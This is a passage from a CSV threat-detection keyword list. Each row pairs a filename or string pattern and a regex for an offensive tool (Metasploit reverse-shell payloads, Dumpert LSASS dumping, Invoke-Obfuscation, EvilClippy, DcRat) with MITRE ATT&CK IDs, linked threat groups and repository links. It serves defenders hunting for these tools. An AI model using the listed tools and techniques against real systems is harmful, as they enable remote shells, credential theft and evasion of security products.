security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54026" "*osx/x64/meterpreter/reverse_tcp*",".{0,1000}osx\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54027" "*osx/x64/meterpreter_reverse_tcp*",".{0,1000}osx\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54028" "*osx/x64/shell_reverse_tcp*",".{0,1000}osx\/x64\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54029" 
"*osx_gatekeeper_bypass.*",".{0,1000}osx_gatekeeper_bypass\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54030" "*OtterHacker/SetProcessInjection*",".{0,1000}OtterHacker\/SetProcessInjection.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","54031" "*OU=qwqdanchun*",".{0,1000}OU\=qwqdanchun.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#content","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","54032" "*ourtn-ftshell-upcommand*",".{0,1000}ourtn\-ftshell\-upcommand.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z","54033" "*-out*.exe -r:*System.Drawing.dll*System.Management.Automation*.dll*",".{0,1000}\-out.{0,1000}\.exe\s\-r\:.{0,1000}System\.Drawing\.dll.{0,1000}System\.Management\.Automation.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","0","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","54034" "*--out=nimcrypt*",".{0,1000}\-\-out\=nimcrypt.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","N/A","1","98","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z","54035" "*Out-CompressedCommand.ps1*",".{0,1000}Out\-CompressedCommand\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54036" "*Out-CompressedDll.ps1*",".{0,1000}Out\-CompressedDll\.ps1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","54037" "*Out-CompressedDLL.ps1*",".{0,1000}Out\-CompressedDLL\.ps1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 
- T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","54038" "*Out-DnsTxt.ps1*",".{0,1000}Out\-DnsTxt\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","54039" "*Out-EncodedAsciiCommand.ps1*",".{0,1000}Out\-EncodedAsciiCommand\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54040" "*Out-EncodedAsciiCommand.ps1*",".{0,1000}Out\-EncodedAsciiCommand\.ps1.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54041" 
"*Out-EncodedBinaryCommand.*",".{0,1000}Out\-EncodedBinaryCommand\..{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54042" "*Out-EncodedBinaryCommand.ps1*",".{0,1000}Out\-EncodedBinaryCommand\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54043" "*Out-EncodedBXORCommand*",".{0,1000}Out\-EncodedBXORCommand.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54044" "*Out-EncodedBXORCommand.ps1*",".{0,1000}Out\-EncodedBXORCommand\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54045" "*Out-EncodedHexCommand.*",".{0,1000}Out\-EncodedHexCommand\..{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and 
other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54046" "*Out-EncodedOctalCommand.*",".{0,1000}Out\-EncodedOctalCommand\..{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54047" "*Out-EncodedOctalCommand.ps1*",".{0,1000}Out\-EncodedOctalCommand\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54048" "*Out-EncodedSpecialCharOnlyCommand*",".{0,1000}Out\-EncodedSpecialCharOnlyCommand.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54049" "*Out-EncodedSpecialCharOnlyCommand.ps1*",".{0,1000}Out\-EncodedSpecialCharOnlyCommand\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense 
Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54050" "*Out-EncodedWhitespaceCommand*",".{0,1000}Out\-EncodedWhitespaceCommand.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54051" "*outflank_stage1.implant*",".{0,1000}outflank_stage1\.implant.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","54052" "*Outflank-Dumpert*",".{0,1000}Outflank\-Dumpert.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","54053" "*Outflank-Dumpert.*",".{0,1000}Outflank\-Dumpert\..{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","54054" "*outflanknl/Dumpert*",".{0,1000}outflanknl\/Dumpert.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","54055" "*outflanknl/EvilClippy*",".{0,1000}outflanknl\/EvilClippy.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","54056" "*outflanknl/Net-GPPPassword*",".{0,1000}outflanknl\/Net\-GPPPassword.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. 
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","N/A","10","2","172","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z","54057" "*outflanknl/NetshHelperBeacon*",".{0,1000}outflanknl\/NetshHelperBeacon.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","1","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","54058" "*outflanknl/PrintNightmare*",".{0,1000}outflanknl\/PrintNightmare.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/outflanknl/PrintNightmare","1","1","N/A","N/A","10","4","337","67","2021-09-13T08:45:26Z","2021-09-13T08:44:02Z","54059" "*outflanknl/Recon-AD*",".{0,1000}outflanknl\/Recon\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","54060" "*outflanknl/Recon-AD*",".{0,1000}outflanknl\/Recon\-AD.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","54061" "*outflanknl/SharpHide*",".{0,1000}outflanknl\/SharpHide.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","54062" "*outflanknl/Spray-AD*",".{0,1000}outflanknl\/Spray\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","54063" "*outflanknl/WdToggle*",".{0,1000}outflanknl\/WdToggle.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","54064" "*Outflank-Recon-AD*",".{0,1000}Outflank\-Recon\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","54065" "*OutlookEmailAbuse.ps1*",".{0,1000}OutlookEmailAbuse\.ps1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","54066" "*Out-Minidump *",".{0,1000}Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - 